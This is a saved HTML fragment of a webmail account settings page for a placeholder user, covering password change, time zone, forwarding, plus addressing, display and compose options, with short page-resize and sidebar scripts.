       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_tabUser'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>User</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_TabStrip_tabDisplay'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Webmail</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_TabStrip_tabCompose'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Compose</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_TabStrip_tabForward'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Forwarding</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_TabStrip_tabPlusAddress'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Plus Addressing</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_tabUser" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel1">
   
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_wucUserSettings_MP1'>
       <input type="hidden" name="ctl00$MPH$wucUserSettings$VisiblePage" id="ctl00_MPH_wucUserSettings_VisiblePage" value="ctl00_MPH_wucUserSettings_pvUserInformation" />
   <div id='ctl00_MPH_wucUserSettings_pvUserInformation' class='' >
           <span id="ctl00_MPH_wucUserSettings_pvUserInformation">
       <table class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_wucUserSettings_txtUN">
                   <td id="ctl00_MPH_wucUserSettings_txtUN_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_wucUserSettings_txtUN_Setting" class="Setting"><span id="ctl00_MPH_wucUserSettings_txtUN_ReadOnlyLabel">dummy</span></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword">
                   <td id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_Label" class="Indent Fixed">Current Password</td><td id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtChangePassword_CurrentPassword_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_txtNP">
                   <td id="ctl00_MPH_wucUserSettings_txtNP_Label" class="Indent Fixed">New Password</td><td id="ctl00_MPH_wucUserSettings_txtNP_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtNP_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtNP_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed">
                   <td id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_Label" class="Indent Fixed">Confirm Password</td><td id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtNewPasswordConfirmed_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_txtDisplayName">
                   <td id="ctl00_MPH_wucUserSettings_txtDisplayName_Label" class="Indent Fixed">Display Name</td><td id="ctl00_MPH_wucUserSettings_txtDisplayName_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtDisplayName_SettingText" type="text" value="dummy@hoytllc.com" id="ctl00_MPH_wucUserSettings_txtDisplayName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_txtReplyToAddress">
                   <td id="ctl00_MPH_wucUserSettings_txtReplyToAddress_Label" class="Indent Fixed">Reply-To Email Address</td><td id="ctl00_MPH_wucUserSettings_txtReplyToAddress_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtReplyToAddress_SettingText" type="text" value="1" id="ctl00_MPH_wucUserSettings_txtReplyToAddress_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddTimeZone">
                   <td id="ctl00_MPH_wucUserSettings_ddTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_wucUserSettings_ddTimeZone_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddTimeZone_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddTimeZone_SettingDropDown">
                       <option selected="selected" value="0">(GMT-12:00) International Date Line West</option>
                       <option value="1">(GMT-11:00) Midway Island, Samoa</option>
                       <option value="2">(GMT-10:00) Hawaii</option>
                       <option value="3">(GMT-09:00) Alaska</option>
                       <option value="-2147483579">(GMT-08:00) Tijuana, Baja California</option>
                       <option value="4">(GMT-08:00) Pacific Time (US &amp; Canada)</option>
                       <option value="-2147483580">(GMT-07:00) Chihuahua, La Paz, Mazatlan - New</option>
                       <option value="10">(GMT-07:00) Mountain Time (US &amp; Canada)</option>
                       <option value="15">(GMT-07:00) Arizona</option>
                       <option value="13">(GMT-07:00) Chihuahua, La Paz, Mazatlan - Old</option>
                       <option value="25">(GMT-06:00) Saskatchewan</option>
                       <option value="30">(GMT-06:00) Guadalajara, Mexico City, Monterrey - Old</option>
                       <option value="20">(GMT-06:00) Central Time (US &amp; Canada)</option>
                       <option value="-2147483581">(GMT-06:00) Guadalajara, Mexico City, Monterrey - New</option>
                       <option value="33">(GMT-06:00) Central America</option>
                       <option value="35">(GMT-05:00) Eastern Time (US &amp; Canada)</option>
                       <option value="40">(GMT-05:00) Indiana (East)</option>
                       <option value="45">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>
                       <option value="-2147483573">(GMT-04:30) Caracas</option>
                       <option value="-2147483576">(GMT-04:00) Manaus</option>
                       <option value="50">(GMT-04:00) Atlantic Time (Canada)</option>
                       <option value="55">(GMT-04:00) La Paz</option>
                       <option value="56">(GMT-04:00) Santiago</option>
                       <option value="60">(GMT-03:30) Newfoundland</option>
                       <option value="70">(GMT-03:00) Buenos Aires, Georgetown</option>
                       <option value="73">(GMT-03:00) Greenland</option>
                       <option value="65">(GMT-03:00) Brasilia</option>
                       <option value="-2147483575">(GMT-03:00) Montevideo</option>
                       <option value="75">(GMT-02:00) Mid-Atlantic</option>
                       <option value="80">(GMT-01:00) Azores</option>
                       <option value="83">(GMT-01:00) Cape Verde Is.</option>
                       <option value="90">(GMT) Casablanca, Monrovia, Reykjavik</option>
                       <option value="85">(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</option>
                       <option value="95">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>
                       <option value="100">(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</option>
                       <option value="105">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>
                       <option value="110">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>
                       <option value="113">(GMT+01:00) West Central Africa</option>
                       <option value="130">(GMT+02:00) Athens, Bucharest, Istanbul</option>
                       <option value="-2147483583">(GMT+02:00) Beirut</option>
                       <option value="-2147483582">(GMT+02:00) Amman</option>
                       <option value="135">(GMT+02:00) Jerusalem</option>
                       <option value="-2147483578">(GMT+02:00) Windhoek</option>
                       <option value="125">(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</option>
                       <option value="140">(GMT+02:00) Harare, Pretoria</option>
                       <option value="115">(GMT+02:00) Minsk</option>
                       <option value="120">(GMT+02:00) Cairo</option>
                       <option value="155">(GMT+03:00) Nairobi</option>
                       <option value="145">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>
                       <option value="150">(GMT+03:00) Kuwait, Riyadh</option>
                       <option value="158">(GMT+03:00) Baghdad</option>
                       <option value="-2147483577">(GMT+03:00) Tbilisi</option>
                       <option value="160">(GMT+03:30) Tehran</option>
                       <option value="165">(GMT+04:00) Abu Dhabi, Muscat</option>
                       <option value="170">(GMT+04:00) Caucasus Standard Time</option>
                       <option value="-2147483584">(GMT+04:00) Baku</option>
                       <option value="-2147483574">(GMT+04:00) Yerevan</option>
                       <option value="175">(GMT+04:30) Kabul</option>
                       <option value="180">(GMT+05:00) Ekaterinburg</option>
                       <option value="185">(GMT+05:00) Islamabad, Karachi, Tashkent</option>
                       <option value="200">(GMT+05:30) Sri Jayawardenepura</option>
                       <option value="190">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>
                       <option value="193">(GMT+05:45) Kathmandu</option>
                       <option value="201">(GMT+06:00) Almaty, Novosibirsk</option>
                       <option value="195">(GMT+06:00) Astana, Dhaka</option>
                       <option value="203">(GMT+06:30) Yangon (Rangoon)</option>
                       <option value="207">(GMT+07:00) Krasnoyarsk</option>
                       <option value="205">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>
                       <option value="225">(GMT+08:00) Perth</option>
                       <option value="210">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>
                       <option value="227">(GMT+08:00) Irkutsk, Ulaan Bataar</option>
                       <option value="220">(GMT+08:00) Taipei</option>
                       <option value="215">(GMT+08:00) Kuala Lumpur, Singapore</option>
                       <option value="240">(GMT+09:00) Yakutsk</option>
                       <option value="230">(GMT+09:00) Seoul</option>
                       <option value="235">(GMT+09:00) Osaka, Sapporo, Tokyo</option>
                       <option value="250">(GMT+09:30) Adelaide</option>
                       <option value="245">(GMT+09:30) Darwin</option>
                       <option value="275">(GMT+10:00) Guam, Port Moresby</option>
                       <option value="255">(GMT+10:00) Canberra, Melbourne, Sydney</option>
                       <option value="270">(GMT+10:00) Vladivostok</option>
                       <option value="260">(GMT+10:00) Brisbane</option>
                       <option value="265">(GMT+10:00) Hobart</option>
                       <option value="280">(GMT+11:00) Magadan, Solomon Is., New Caledonia</option>
                       <option value="285">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>
                       <option value="290">(GMT+12:00) Auckland, Wellington</option>
                       <option value="300">(GMT+13:00) Nuku'alofa</option>

                   </select></td>
               </tr>
           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvForwarding' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvForwarding">
       <table class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_wucUserSettings_txtForwardingAddress">
                   <td id="ctl00_MPH_wucUserSettings_txtForwardingAddress_Label" class="Indent Fixed">Forwarding Address</td><td id="ctl00_MPH_wucUserSettings_txtForwardingAddress_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtForwardingAddress_SettingText" type="text" id="ctl00_MPH_wucUserSettings_txtForwardingAddress_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkDeleteMessageOnForward">
                   <td id="ctl00_MPH_wucUserSettings_chkDeleteMessageOnForward_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkDeleteMessageOnForward_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkDeleteMessageOnForward_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkDeleteMessageOnForward_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkDeleteMessageOnForward_SettingCheck">Enable deletion of messages on forward</label></td>
               </tr>
           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvPlusAddressing' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvPlusAddressing">
       <table id="ctl00_MPH_wucUserSettings_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_wucUserSettings_ddPlusAction">
                   <td id="ctl00_MPH_wucUserSettings_ddPlusAction_Label" class="Indent Fixed">Action</td><td id="ctl00_MPH_wucUserSettings_ddPlusAction_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddPlusAction_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddPlusAction_SettingDropDown">
                       <option selected="selected" value="autocreate">Move to Folder</option>
                       <option value="">Move to Folder (If Exists)</option>
                       <option value="inbox">Leave in Inbox</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkPlusEnabled">
                   <td id="ctl00_MPH_wucUserSettings_chkPlusEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkPlusEnabled_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkPlusEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkPlusEnabled_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkPlusEnabled_SettingCheck">Enable plus addressing</label></td>
               </tr>
           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvDisplaySettings' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvDisplaySettings">
       <table class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_wucUserSettings_StartupPageList">
                   <td id="ctl00_MPH_wucUserSettings_StartupPageList_Label" class="Indent Fixed">Initial Page on Login</td><td id="ctl00_MPH_wucUserSettings_StartupPageList_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$StartupPageList_SettingDropDown" id="ctl00_MPH_wucUserSettings_StartupPageList_SettingDropDown">
                       <option selected="selected" value="today">My Today Page</option>
                       <option value="inbox">My Inbox</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddDisplayMessagesAs">
                   <td id="ctl00_MPH_wucUserSettings_ddDisplayMessagesAs_Label" class="Indent Fixed">Display Format</td><td id="ctl00_MPH_wucUserSettings_ddDisplayMessagesAs_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddDisplayMessagesAs_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddDisplayMessagesAs_SettingDropDown">
                       <option selected="selected" value="html">HTML</option>
                       <option value="plain">Text</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddSortMessagesBy">
                   <td id="ctl00_MPH_wucUserSettings_ddSortMessagesBy_Label" class="Indent Fixed">Sort Messages by</td><td id="ctl00_MPH_wucUserSettings_ddSortMessagesBy_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddSortMessagesBy_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddSortMessagesBy_SettingDropDown">
                       <option selected="selected" value="From">From</option>
                       <option value="Subject">Subject</option>
                       <option value="Size">Size</option>
                       <option value="InternalDate">Date</option>

                   </select><input id="ctl00_MPH_wucUserSettings_ctl03" type="checkbox" name="ctl00$MPH$wucUserSettings$ctl03" /><label for="ctl00_MPH_wucUserSettings_ctl03">Descending</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddDeletedMessages">
                   <td id="ctl00_MPH_wucUserSettings_ddDeletedMessages_Label" class="Indent Fixed">Delete Action</td><td id="ctl00_MPH_wucUserSettings_ddDeletedMessages_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddDeletedMessages_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddDeletedMessages_SettingDropDown">
                       <option selected="selected" value="0">Move to Deleted Items Folder</option>
                       <option value="1">Auto Purge Folder</option>
                       <option value="2">Mark as Deleted</option>
                       <option value="3">Mark as Deleted and Hide</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddPreviewPane">
                   <td id="ctl00_MPH_wucUserSettings_ddPreviewPane_Label" class="Indent Fixed">Preview Pane</td><td id="ctl00_MPH_wucUserSettings_ddPreviewPane_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddPreviewPane_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddPreviewPane_SettingDropDown">
                       <option selected="selected" value="bottom">Bottom</option>
                       <option value="right">Right Side</option>
                       <option value="disabled">Disabled</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkAutoPreview">
                   <td id="ctl00_MPH_wucUserSettings_chkAutoPreview_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkAutoPreview_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkAutoPreview_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkAutoPreview_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkAutoPreview_SettingCheck">Enable automatic preview</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkAutoMarkAsRead">
                   <td id="ctl00_MPH_wucUserSettings_chkAutoMarkAsRead_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkAutoMarkAsRead_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkAutoMarkAsRead_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkAutoMarkAsRead_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkAutoMarkAsRead_SettingCheck">Enable automatic mark as read for previewed messages</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkBlockImages">
                   <td id="ctl00_MPH_wucUserSettings_chkBlockImages_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkBlockImages_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkBlockImages_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkBlockImages_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkBlockImages_SettingCheck">Disable automatic image loading in preview pane</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders">
                   <td id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkAutoPopupReminders_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkAutoPopupReminders_SettingCheck">Enable automatic reminder popup</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkDisableReminders">
                   <td id="ctl00_MPH_wucUserSettings_chkDisableReminders_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkDisableReminders_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkDisableReminders_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkDisableReminders_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkDisableReminders_SettingCheck">Disable reminders for appointments and tasks</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkEnableAnimations">
                   <td id="ctl00_MPH_wucUserSettings_chkEnableAnimations_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkEnableAnimations_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkEnableAnimations_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkEnableAnimations_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkEnableAnimations_SettingCheck">Enable animations</label></td>
               </tr>
           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvComposeSettings' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvComposeSettings">
       <table class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_wucUserSettings_ddComposeAs">
                   <td id="ctl00_MPH_wucUserSettings_ddComposeAs_Label" class="Indent Fixed">Compose Format</td><td id="ctl00_MPH_wucUserSettings_ddComposeAs_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddComposeAs_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddComposeAs_SettingDropDown">
                       <option selected="selected" value="html">HTML</option>
                       <option value="plain">Text</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddComposeFont">
                   <td id="ctl00_MPH_wucUserSettings_ddComposeFont_Label" class="Indent Fixed">Compose Font</td><td id="ctl00_MPH_wucUserSettings_ddComposeFont_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddComposeFont_SettingDropDown1" id="ctl00_MPH_wucUserSettings_ddComposeFont_SettingDropDown1">
                       <option selected="selected" value="Arial, Helvetica, sans-serif">Arial</option>
                       <option value="Courier New, monospace">Courier</option>
                       <option value="Georgia, serif">Georgia</option>
                       <option value="Lucida Sans Unicode, Lucida Grande, sans-serif">Lucida</option>
                       <option value="Lucida Console, Monaco, monospace">Lucida Console</option>
                       <option value="Palatino Linotype, Book Antiqua, Palatino, serif">Palatino</option>
                       <option value="Tahoma, Geneva, sans-serif">Tahoma</option>
                       <option value="Times New Roman, Times, serif">Times</option>
                       <option value="Trebuchet MS, sans-serif">Trebuchet</option>
                       <option value="Verdana, Arial, Helvetica, sans-serif">Verdana</option>

                   </select> <select name="ctl00$MPH$wucUserSettings$ddComposeFont_SettingDropDown2" id="ctl00_MPH_wucUserSettings_ddComposeFont_SettingDropDown2">
                       <option selected="selected" value="8pt">8pt</option>
                       <option value="9pt">9pt</option>
                       <option value="10pt">10pt</option>
                       <option value="12pt">12pt</option>
                       <option value="14pt">14pt</option>
                       <option value="16pt">16pt</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddTextEncoding">
                   <td id="ctl00_MPH_wucUserSettings_ddTextEncoding_Label" class="Indent Fixed">Text Encoding</td><td id="ctl00_MPH_wucUserSettings_ddTextEncoding_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddTextEncoding_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddTextEncoding_SettingDropDown">
                       <option selected="selected" value="28596">Arabic (ISO)</option>
                       <option value="1256">Arabic (Windows)</option>
                       <option value="28594">Baltic (ISO)</option>
                       <option value="1257">Baltic (Windows)</option>
                       <option value="28592">Central European (ISO)</option>
                       <option value="1250">Central European (Windows)</option>
                       <option value="54936">Chinese Simplified (GB18030)</option>
                       <option value="936">Chinese Simplified (GB2312)</option>
                       <option value="52936">Chinese Simplified (HZ)</option>
                       <option value="950">Chinese Traditional (Big5)</option>
                       <option value="28595">Cyrillic (ISO)</option>
                       <option value="20866">Cyrillic (KOI8-R)</option>
                       <option value="21866">Cyrillic (KOI8-U)</option>
                       <option value="1251">Cyrillic (Windows)</option>
                       <option value="28597">Greek (ISO)</option>
                       <option value="1253">Greek (Windows)</option>
                       <option value="1255">Hebrew (Windows)</option>
                       <option value="38598">Hewbrew (ISO-Logical)</option>
                       <option value="50220">Japanese (JIS)</option>
                       <option value="50221">Japanese (JIS-Allow 1 byte Kana)</option>
                       <option value="932">Japanese (Shift-JIS)</option>
                       <option value="949">Korean</option>
                       <option value="51949">Korean (EUC)</option>
                       <option value="50225">Korean (ISO)</option>
                       <option value="28593">Latin 3 (ISO)</option>
                       <option value="28605">Latin 9 (ISO)</option>
                       <option value="874">Thai (Windows)</option>
                       <option value="28599">Turkish (ISO)</option>
                       <option value="1254">Turkish (Windows)</option>
                       <option value="65000">Unicode (UTF-7)</option>
                       <option value="65001">Unicode (UTF-8)</option>
                       <option value="20127">US-ASCII</option>
                       <option value="1258">Vietnamese (Windows)</option>
                       <option value="28591">Western European (ISO) (default)</option>
                       <option value="1252">Western European (Windows)</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary">
                   <td id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary_Label" class="Indent Fixed">Spell Check Dictionary</td><td id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddSpellCheckDictionary_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddSpellCheckDictionary_SettingDropDown">
                       <option value="">Attempt to use language from login</option>
                       <option selected="selected" value="en-US">English (United States)</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddForwardingMethod">
                   <td id="ctl00_MPH_wucUserSettings_ddForwardingMethod_Label" class="Indent Fixed">Forwarding Method</td><td id="ctl00_MPH_wucUserSettings_ddForwardingMethod_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddForwardingMethod_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddForwardingMethod_SettingDropDown">
                       <option selected="selected" value="normal">Normal</option>
                       <option value="plain">Text</option>
                       <option value="attachment">Embed as Attachment</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft">
                   <td id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft_Label" class="Indent Fixed">Auto Save Frequency</td><td id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddAutoSaveDraft_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddAutoSaveDraft_SettingDropDown">
                       <option selected="selected" value="0">None</option>
                       <option value="60000">1 Minute</option>
                       <option value="120000">2 Minutes</option>
                       <option value="180000">3 Minutes</option>
                       <option value="300000">5 Minutes</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_ddReplyHeaderType">
                   <td id="ctl00_MPH_wucUserSettings_ddReplyHeaderType_Label" class="Indent Fixed">Reply Header Type</td><td id="ctl00_MPH_wucUserSettings_ddReplyHeaderType_Setting" class="Setting"><select name="ctl00$MPH$wucUserSettings$ddReplyHeaderType_SettingDropDown" id="ctl00_MPH_wucUserSettings_ddReplyHeaderType_SettingDropDown">
                       <option selected="selected" value="Basic">Basic</option>
                       <option value="Full">Full</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_txtReplyIndicator">
                   <td id="ctl00_MPH_wucUserSettings_txtReplyIndicator_Label" class="Indent Fixed">Reply Text Indicator</td><td id="ctl00_MPH_wucUserSettings_txtReplyIndicator_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtReplyIndicator_SettingText" type="text" value=">" size="4" id="ctl00_MPH_wucUserSettings_txtReplyIndicator_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkEmbedReplies">
                   <td id="ctl00_MPH_wucUserSettings_chkEmbedReplies_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkEmbedReplies_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkEmbedReplies_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkEmbedReplies_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkEmbedReplies_SettingCheck">Enable inclusion of previous replies in reply</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkSaveSentItems">
                   <td id="ctl00_MPH_wucUserSettings_chkSaveSentItems_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkSaveSentItems_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkSaveSentItems_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkSaveSentItems_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkSaveSentItems_SettingCheck">Enable sent items folder</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkRequestReceipt">
                   <td id="ctl00_MPH_wucUserSettings_chkRequestReceipt_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkRequestReceipt_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkRequestReceipt_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkRequestReceipt_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkRequestReceipt_SettingCheck">Enable read receipts by default</label></td>
               </tr><tr id="ctl00_MPH_wucUserSettings_chkAutoTrust">
                   <td id="ctl00_MPH_wucUserSettings_chkAutoTrust_Label" class="Indent Fixed"></td><td id="ctl00_MPH_wucUserSettings_chkAutoTrust_Setting" class="Setting"><input id="ctl00_MPH_wucUserSettings_chkAutoTrust_SettingCheck" type="checkbox" name="ctl00$MPH$wucUserSettings$chkAutoTrust_SettingCheck" /><label for="ctl00_MPH_wucUserSettings_chkAutoTrust_SettingCheck">Enable trusted sender for webmail recipients</label></td>
               </tr>
           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvUserGroups' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvUserGroups">
       <table id="ctl00_MPH_wucUserSettings_tblUserGroups" class="SettingsContainer SCMarginTop" border="0">

           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvThrottling' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvThrottling">
       <table class="SettingsContainer SCMarginTop" border="0">

           </table>
   </span></div>
       
   <div id='ctl00_MPH_wucUserSettings_pvServicePermissions' class='' style='display:none'>
           <span id="ctl00_MPH_wucUserSettings_pvServicePermissions">
       <table id="ctl00_MPH_wucUserSettings_ServicePermissionsContainer" class="SettingsContainer SCMarginTop" border="0">

           </table>
   </span></div>
       
</div>
   

       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/frmmysettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmMySettings\x2easpx?'); });
